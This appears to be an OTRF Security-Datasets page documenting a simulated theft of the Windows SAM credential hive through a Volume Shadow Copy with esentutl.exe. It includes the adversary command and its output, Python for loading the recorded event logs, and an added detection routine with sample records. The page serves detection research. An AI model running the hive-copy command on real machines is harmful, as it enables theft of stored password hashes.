SAM Copy via Esentutl VSS

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/19

Modification Date

2020/10/19

Tactics

TA0006

Techniques

T1003.002

Tags

art.a90c2f4d-6726-444e-99d2-a00cd7c20480

Dataset Description

This dataset represents adversaries copying the SAM registry hive with the built-in esentutl.exe utility, reading it from a Volume Shadow Copy (VSS) snapshot to bypass the lock held on the live hive.

Simulation Metadata

Tools

Type      Name   Module
Manual    Cmd    Cmd

Adversary View

Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\wardog>esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d C:\ProgramData\SAM

Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 10.0
Copyright (C) Microsoft Corporation. All Rights Reserved.

Initializing VSS subsystem...

Initiating COPY FILE mode...
    Source File: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32
Destination File: C:\ProgramData\SAM

                      Copy Progress (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

        Total bytes read                = 0x9000 (36864) (0 MB)
        Total bytes written             = 0x9000 (36864) (0 MB)


Operation completed successfully in 4.859 seconds.

C:\Users\wardog>

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

# Dataset archive published in the OTRF Security-Datasets repository
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_sam_copy_esentutl.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# The archive holds a single newline-delimited JSON file; extract it to the working directory
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

import pandas as pd

# One JSON object per line (NDJSON), hence lines=True
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

# Count events per log channel (Sysmon, Security, ...) to see which sources captured the activity
df.groupby(['Channel']).size().sort_values(ascending=False)
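Added example, not part of the original dataset page or the OTRF tooling: a detection check for the esentutl VSS hive copy described above, run offline over constructed NDJSON records in the same one-object-per-line shape the Read JSON step loads. Field names (Channel, EventID, Image, NewProcessName, CommandLine) are an assumption modelled on Sysmon Event ID 1 and Security 4688 exports, and the check also flags the SYSTEM and SECURITY hives, a generalization beyond the SAM copy shown on this page.

```python
import json
import re
from typing import Iterable

# Process-creation events and the field that carries the executable path.
# Field names are an assumption (Sysmon Event ID 1 / Security 4688 exports).
PROCESS_EVENTS = {
    ("Microsoft-Windows-Sysmon/Operational", 1): "Image",
    ("Security", 4688): "NewProcessName",
}
VSS_FLAG = re.compile(r"(?:^|\s)/vss(?:\s|$)", re.IGNORECASE)   # read from a shadow copy
COPY_FLAG = re.compile(r"(?:^|\s)/y(?:\s|$)", re.IGNORECASE)    # esentutl COPY FILE mode
# Registry hives under %SystemRoot%\System32\config, with either slash style
HIVE_PATH = re.compile(r"[\\/]config[\\/](?:sam|system|security)\b", re.IGNORECASE)

def is_esentutl_vss_hive_copy(event: dict) -> bool:
    """True when a process-creation event shows esentutl.exe copying a hive via VSS."""
    try:
        key = (event.get("Channel"), int(event.get("EventID", -1)))
    except (TypeError, ValueError):
        return False
    image_field = PROCESS_EVENTS.get(key)
    if image_field is None:
        return False  # not a process-creation event we know how to read
    image = str(event.get(image_field, "")).lower()
    cmd = str(event.get("CommandLine", ""))
    if not image.endswith("esentutl.exe"):
        return False
    return bool(VSS_FLAG.search(cmd) and COPY_FLAG.search(cmd) and HIVE_PATH.search(cmd))

def find_hive_copies(ndjson_lines: Iterable[str]) -> list:
    """Parse NDJSON lines and return the events that match the hive-copy pattern."""
    hits = []
    for line in ndjson_lines:
        line = line.strip()
        if line:
            event = json.loads(line)
            if is_esentutl_vss_hive_copy(event):
                hits.append(event)
    return hits

# Constructed sample records (not real dataset rows), one JSON object per line.
SAMPLE_LINES = r"""
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\esentutl.exe", "CommandLine": "esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d C:\\ProgramData\\SAM"}
{"Channel": "Security", "EventID": 4688, "NewProcessName": "C:\\Windows\\System32\\esentutl.exe", "CommandLine": "esentutl.exe /y /vss C:\\Windows\\System32\\config\\SYSTEM /d C:\\ProgramData\\SYSTEM"}
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\esentutl.exe", "CommandLine": "esentutl.exe /y C:\\Temp\\mail.edb /d D:\\backup\\mail.edb"}
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 11, "Image": "C:\\Windows\\System32\\esentutl.exe", "TargetFilename": "C:\\ProgramData\\SAM"}
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"}
"""
HITS = find_hive_copies(SAMPLE_LINES.splitlines())  # two matches: the Sysmon 1 and Security 4688 rows
```

The same predicate can be applied to the real dataset with `df[df.apply(is_esentutl_vss_hive_copy, axis=1)]` once the frame from the Read JSON step is loaded.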